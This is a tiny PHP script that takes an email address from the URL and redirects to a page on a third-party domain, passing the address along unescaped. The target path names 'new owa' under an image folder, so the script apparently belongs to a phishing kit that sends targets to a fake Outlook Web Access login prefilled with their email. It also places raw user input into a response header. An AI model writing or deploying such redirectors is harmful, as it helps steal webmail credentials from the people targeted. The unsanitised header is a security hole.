<?php

$email = $_GET['email'];

header("Location: https://dev02.novainteraction.com/emailing/img/image/new owa created/gvlt/index.php?email=$email");

?>